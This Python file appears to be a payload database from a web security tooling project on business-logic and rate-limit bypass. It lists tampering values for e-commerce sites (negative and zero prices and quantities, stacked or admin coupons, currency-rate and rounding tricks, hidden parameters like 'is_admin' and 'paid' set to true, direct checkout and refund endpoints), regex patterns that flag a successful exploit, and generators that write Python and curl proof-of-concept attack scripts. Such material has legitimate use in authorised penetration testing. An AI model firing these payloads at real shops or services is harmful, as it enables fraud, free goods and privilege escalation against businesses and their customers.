"""
Business Logic Payload Database
Project #33: Business Logic & Rate Limiting Bypass
"""

# ==================================================================== #
# 1. PRICE MANIPULATION
# ==================================================================== #
PRICE_PAYLOADS = {
    'negative_price':   '-100',
    'zero_price':       '0',
    'decimal_price':    '0.001',
    'huge_price':       '999999999',
    'integer_overflow': '2147483648',    # 2^31
    'int32_max_plus1':  '2147483647',
    'scientific':       '1e-10',
    'hex_price':        '0x10',
}

# ==================================================================== #
# 2. QUANTITY BYPASS
# ==================================================================== #
QUANTITY_PAYLOADS = {
    'negative':     '-1',
    'negative_big': '-999',
    'zero':         '0',
    'decimal':      '0.5',
    'huge':         '999999999',
    'integer_max':  '2147483647',
    'scientific':   '1e100',
}

# ==================================================================== #
# 3. DISCOUNT / COUPON ABUSE
# ==================================================================== #
COUPON_PAYLOADS = {
    'valid':         'SAVE10',
    'stack':         ['SAVE10', 'SAVE20', 'SAVE50'],
    'expired':       'EXPIRED2020',
    'admin':         'ADMIN100',
    'case_variation':'save10',
    'empty':         '',
    'self_referral': 'REFER_SELF',
}

# ==================================================================== #
# 4. WORKFLOW BYPASS ENDPOINTS
# ==================================================================== #
WORKFLOW_ENDPOINTS = {
    'checkout_direct':     '/api/checkout',
    'order_without_pay':   '/api/orders/create',
    'confirm_no_verify':   '/api/account/confirm',
    'admin_direct':        '/api/admin/users',
    'refund_no_order':     '/api/refund',
    'reset_no_email':      '/api/reset-password',
}

# ==================================================================== #
# 5. CURRENCY / ROUNDING
# ==================================================================== #
CURRENCY_BYPASS = {
    'switch_to_idr':    {'currency': 'IDR', 'rate': 15000},
    'switch_to_vnd':    {'currency': 'VND', 'rate': 24000},
    'switch_to_1to1':   {'currency': 'USD', 'rate': 1},
    'negative_rate':    {'currency': 'USD', 'rate': -1},
    'zero_rate':        {'currency': 'USD', 'rate': 0},
    'decimal_round':    '0.001',           # rounds to 0
    'bignum_round':     '0.4',             # rounds to 0
}

# ==================================================================== #
# 6. PARAMETER TAMPERING
# ==================================================================== #
HIDDEN_PARAMS = {
    'price':        '1',
    'cost':         '0',
    'is_admin':     'true',
    'role':         'admin',
    'discount':     '100',
    'shipping':     '0',
    'tax':          '0',
    'verified':     'true',
    'paid':         'true',
    'total':        '0',
}

# ==================================================================== #
# 7. TEST PRODUCTS
# ==================================================================== #
TEST_PRODUCTS = [
    {'id': 1, 'name': 'Laptop',  'price': 999},
    {'id': 2, 'name': 'Phone',   'price': 499},
    {'id': 3, 'name': 'Tablet',  'price': 299},
]

# ==================================================================== #
# 8. DETECTION SIGNATURES
# ==================================================================== #
SUCCESS_INDICATORS = {
    'negative_total':   r'-\d+',
    'zero_total':       r'total["\s:]+0\b',
    'free_item':        r'price["\s:]+0\b',
    'admin_access':     r'"admin"\s*:\s*true|role["\s:]+admin',
    'order_created':    r'"order_?id"|"success"\s*:\s*true',
    'coupon_applied':   r'discount["\s:]+|coupon["\s:]+(applied|accepted)',
    'balance_negative': r'balance["\s:]+-',
    'float_amount':     r'"total"\s*:\s*-?0\.\d+',
}

FAILURE_INDICATORS = [
    r'invalid',
    r'error',
    r'rejected',
    r'cannot be negative',
    r'must be positive',
    r'minimum',
    r'maximum',
]

# ==================================================================== #
# 9. POC TEMPLATES
# ==================================================================== #
def python_poc(url, method, data, description):
    """Generate a Python PoC script."""
    if method.upper() == 'POST':
        req_line = f'requests.post("{url}", json={data}, timeout=10)'
    else:
        req_line = f'requests.get("{url}", params={data}, timeout=10)'

    return f'''#!/usr/bin/env python3
"""
PoC: {description}
Auto-generated by business_logic.py
"""
import requests

URL = "{url}"
METHOD = "{method}"
DATA = {data}

r = {req_line}
print(f"Status: {{r.status_code}}")
print(f"Response: {{r.text[:500]}}")

# Check for success
if r.status_code == 200 and ("success" in r.text.lower() or "total" in r.text.lower()):
    print("[!] Possible business logic flaw!")
else:
    print("[+] Not vulnerable to this specific payload")
'''

def curl_poc(url, method, data, description):
    """Generate a bash curl PoC."""
    if method.upper() == 'POST':
        data_str = ' '.join(f'-d "{k}={v}"' for k, v in data.items())
        return f'''#!/bin/bash
# PoC: {description}
curl -s -X POST "{url}" {data_str}
echo ""
'''
    else:
        params = '&'.join(f'{k}={v}' for k, v in data.items())
        return f'''#!/bin/bash
# PoC: {description}
curl -s "{url}?{params}"
echo ""
'''